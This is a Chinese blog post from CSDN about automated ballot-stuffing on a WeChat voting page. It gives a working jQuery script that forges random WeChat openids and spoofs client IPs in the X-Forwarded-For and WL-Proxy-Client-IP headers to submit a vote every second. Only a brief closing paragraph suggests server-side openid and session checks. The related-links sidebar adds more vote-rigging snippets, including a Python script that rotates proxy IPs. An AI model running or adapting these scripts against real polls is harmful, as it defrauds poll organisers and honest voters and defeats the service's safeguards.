一代JS代码可以搞定机器自动刷票,投票页数据验证很重要

最新推荐文章于 2021-03-21 12:56:38 发布
最新推荐文章于 2021-03-21 12:56:38 发布
阅读量1k 收藏 4
点赞数
分类专栏: JQUERY javascript 文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28471389/article/details/110439567
版权

1.直接电脑使用谷歌浏览器进去朋友的投票页面,f12查看页面内容

 

其实在页面上手动随意修改上图中openid,即可肆意不限制投票。但这样操作太麻烦了,可以看下js源码

 

上图可以看出,其实只要openid,和toopenid即可,openid是自己的微信id,toopenid是投票对象的微信id,那我们定时修改openid即可给某一个人刷投票

下面贴代码

    //执行脚本
	function init(){
    	 initIp();
    }
	//定时操作,每秒执行一次
    function demo(){ 
        setInterval("init()",1000);
    }
	//随机生成以ovgMdt开头的27位微信openid(字母大小写+数字)
	function createNum(){
    	var str = "ovgMdt",
    	        range = 21,
    	        arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
    	 	// 随机产生
    	    for(var i=0; i<range; i++){
    	        pos = Math.round(Math.random() * (arr.length-1));
    	        str += arr[pos];
    	    }
    	    return str;
    	
    }
	//提交请求
    function initIp(){
    	var ip=createIp();
		var num=createNum();
		var $toopenid='ovgMdtSysi89sfInf0pdfg5T';
		var submitData = {
                toopenid: $toopenid,
                openid: num
            };
    	$.ajax({
				headers:{'x-forwarded-for':ip,'WL-Proxy-Client-IP':ip},
				type: "POST",
                url: "xxxxxxxxxxxxxx",
				data: submitData,
                dataType: "json",
                beforeSend: function () {},
                success: function (data) {
                    if (data.code == 0) {
                        $("#"+$toopenid).text(data.vote);
                        if(data.today_vote >= 2){
                            $(".vote").addClass("red");
                        }
                        $("#"+$toopenid).parent().find(".plus").css({"top":"186px","opacity":0});
                        $("#"+$toopenid).parent().find(".plus").stop().animate({"top":"176px","opacity":1},300,"swing").animate({"opacity":0},100);
                    } else {
                        alert(data.msg);
                    }
                }
		});
    }
	//生成随机的ip地址
    function createIp() {
		var a = Math.round(Math.random() * 250) + 1,
			b = Math.round(Math.random() * 250) + 1,
		c = Math.round(Math.random() * 240) + 1,
		d = Math.round(Math.random() * 240) + 1;
		return [a, b, c, d].join('.');
	}

如果只是IP限制,那就更好办了,伪造一个IP也是一个原理,JS开个定时任务,刷,刷,刷。

解决方案

本安全中,投票提交的动作没有加验证,所以才会被无限刷票。其实只要加一个小小的限制就可以解决这样的问题,比如在提交前收集到用户信息提交到数据库,投票的时候查下这个OPENID是否在数据库中存在即可。登录成功后也存下SESSION,这样就不会随意被刷了。

qq_28471389
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
>>我要到处浪系列 之 JS随便投票脚本
weixin_30642869的博客
11-14 83
首先郑重声明:我不是对任何网站或者任何个人或组织有意见,仅仅是觉得 4点几 的评分对某些玩票的片段都太高了,为了落实想法,切实履行公民的投票权,并且 bibibabibobi biubiubiu..所以写了点小东西投票啊啊啊啊!!! 开始firebug分析了一下投票逻辑,发现他这边直接是前端验证cookies来判断投了没,可能也是小站点的问题,不结合物理地址也不让登陆才能投票...
投票系统 & js脚本简单刷票
zzz19的博客
09-08 1177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
JS实现投票代码
qq_43255053的博客
12-21 2773
有朋友反映代码不能用,是因为编辑器里面上传代码会把脚本自动添加注释,单独贴一下样式和脚本把! 那会看到CSDN上有投票的功能,感觉很好,以前是用jfreechart实现的,现在用js实现,很节省资源啊,呵呵.....写的有点不好,希望大家指教,哈哈.......... &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN...
记一次js投票刷票成功的过程
Ayaki_murasami的博客
09-21 816
家庭群里,时不时的亲戚就会要求给他投票啊什么的……有的还要你每天帮忙一次。真的是,我又不是上班,凭什么要求我打卡!不行,我要试试看能不能刷! 一:规则 打开网一看:是一个免登录的投票面: 其规则为:每个IP每天可以投票三次。 好家伙!没有登录,没有验证码,正是小试牛刀的好对象! 二:研究 找到待投票的项目,发现其源码写着: 找到votes方法: //-投票 var isSubmit = ...
《后来的我们》退票风波 猫眼回应暂不确定人为or机器刷票
yssycz的博客
05-04 1370
7天票房10.60亿(仍在增长),对于新晋导演刘若英而言,无疑交了一份不错的答卷。但在《后来的我们》这部电影热映的同时,因出现大量退票事件,再次受到人们关注。而作为出品方、发行方及售票平台等多重身份的猫眼,受此事件被推向风口浪尖。电影《后来的我们》海报此前,在退票风波出现后,猫眼在微博中就此事发布了声明:截至4月28日23点,经排查,猫眼平台疑似恶意刷票并退票数量约38万张,涉及票房月1300万,...
投票系统源代码,防止刷票
12-17
项目介绍: (1)制作一个投票系统,让学生给自己喜爱的老师投票。该系统由投票界面组成,系统运行,投票界面出现,标题为“欢迎给老师投票”;...(3)进一步思考,考虑系统是否存在刷票的隐患,如何防止刷票
js脚本编写简单刷票投票系统
11-30
本文实例为大家分享了js刷票投票系统的具体代码,供大家参考,具体内容如下 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> &lt...
一贝投票系统 v6.8 (防刷票版).zip
06-19
2. **验证验证**:为了增加自动刷票的难度,系统可能会采用滑动验证码、图片验证码或者数学问题等方式,要求用户完成验证后才能进行投票。 3. **设备识别**:通过对设备指纹的分析,系统可以识别出来自同一设备的...
禁止刷票投票算法
10-31
主要是算法思想。程序不完整、下载请郑重。主要算法思想:根据每天投票次数设定,统计历史投票判定能否投票、加密投票对象的ID、加密IP传输参数、对投票区间数据统计、时间戳判定等主要是防止一般的机器刷票行为。
易语言网自动投票
07-19
通过研究这个易语言网自动投票源码,开发者可以学习到如何利用易语言进行网络编程,实现网互动功能,并且可以进一步扩展到其他自动化任务,如数据抓取、自动化测试等领域。同时,这也是一次实践编程逻辑、优化...
买到回家的票了吗?快用Python刷票试试!
weixin_34221332的博客
01-05 99
本人对于Python学习创建了一个小小的学习圈子,为各位提供了一个平台,大家一起来讨论学习Python。欢迎各位到来Python学习群:960410445一起讨论视频分享学习。Python是未来的发展方向,正在挑战我们的分析能力及对世界的认知方式,因此,我们与时俱进,迎接变化,并不断的成长,掌握Python核心技术,才是掌握真正的价值所在。先来看一下该程序的思路图:执行该程序使用 Python ...
干货分享-刷票如此简单,一句js代码搞定
不好好写博客,竹牙丝伺候!
09-25 3490
1、先看效果图注意倒数第二个选项自动从97票刷到100多票哦~ 2、代码就一句setInterval(function(){$(“#vote_5”).click()},1000); 解读:设置一个1秒执行1次的循环定时器,执行一个匿名的方法,匿名方法里找到id为vote_5的按钮,模拟一次点击事件。3、解题思路3.1、通过chrome浏览器的检查,查看触发投票的事件是哪个元素的,找出这个元素。
一些简单的javascript功能实现
weixin_34008784的博客
08-03 237
2019独角兽企业重金招聘Python工程师标准>>> ...
自动投票的一个脚本
weixin_30512089的博客
06-30 952
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript">function XMLHttpObject(method,url,Syne){var XMLHttp=null;var o=this;this.method=method;this.url=url;this.Syne=Syne;this.text="";this....
用java发送ajax请求实现刷票(干坏事^_^)
75闪光雷的博客
04-18 6192
import java.io.IOException; import org.apache.commons.httpclient.HttpClient; import org.apache.commons.httpclient.HttpException; import org.apache.commons.httpclient.HttpStatus; import org.apache.com
ajax php投票记录功能,PHP 实例 AJAX 投票 | 菜鸟教程
weixin_36140683的博客
03-10 118
PHP 实例 - AJAX 投票AJAX 投票在下面的实例中,我们将演示一个投票程序,通过它,投票结果在网不进行刷新的情况下被显示。你喜欢 PHP 和 AJAX 吗?是:否:实例解释 - HTML 面当用户选择上面的某个选项时,会执行名为 "getVote()" 的函数。该函数由 "onclick" 事件触发。poll.html 文件代码如下:菜鸟教程(runoob.com)function ...
java停止ajax请求,用java发送ajax请求实现刷票(干坏事^_^)
weixin_33655208的博客
03-21 83
import java.io.IOException;import org.apache.commons.httpclient.HttpClient;import org.apache.commons.httpclient.HttpException;import org.apache.commons.httpclient.HttpStatus;import org.apache.commons....
微信企业号之userid与openid互转
lss0555的博客
12-05 8498
一.前言 该接口使用场景为微信支付、微信红包和企业转账,企业号用户在使用微信支付的功能时,需要自行将企业号的userid转成openid。在使用微信红包功能时,需要将应用id和userid转成appid和openid才能使用。 二.userid转换为openid 请求说明 Https请求方式: POST https://qyapi.weixin.qq.com/cgi-bin/user/conver...
JavaScript刷票
faicm的专栏
09-11 1011
== var tofind = function() { console.log("寻找") var tr = $("#queryLeftTable").find("tr"); for (var i = 0; i < tr.length; i++, i++) { var cc = $($(tr[i]).find("td")[7]).text(); if (cc != '--' &&
python微信刷票代码
最新发布
12-27
根据提供的引用内容,以下是一个使用Python进行微信刷票的示例代码: ```python import requests import re def get_proxy_ips(): url = "http://api.xicidaili.com/free2016.txt" r = requests.get(url=url) all_url = re.findall("\d+\.\d+\.\d+\.\d+:\d+", r.text) with open("IP.txt", 'w') as f: for i in all_url: f.write(i) f.write(' ') return all_url def vote_with_proxy_ips(vote_url, proxy_ips): for ip in proxy_ips: proxies = { 'http': 'http://' + ip, 'https': 'https://' + ip } try: response = requests.get(vote_url, proxies=proxies) if response.status_code == 200: print("投票成功!") else: print("投票失败!") except: print("代理IP不可用!") # 使用示例 vote_url = "http://example.com/vote" proxy_ips = get_proxy_ips() vote_with_proxy_ips(vote_url, proxy_ips) ``` 这段代码首先通过请求获取代理IP地址,然后使用这些代理IP地址进行投票。每个代理IP地址都会尝试进行投票,如果投票成功则输出"投票成功!",否则输出"投票失败!"。如果代理IP不可用,则输出"代理IP不可用!"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值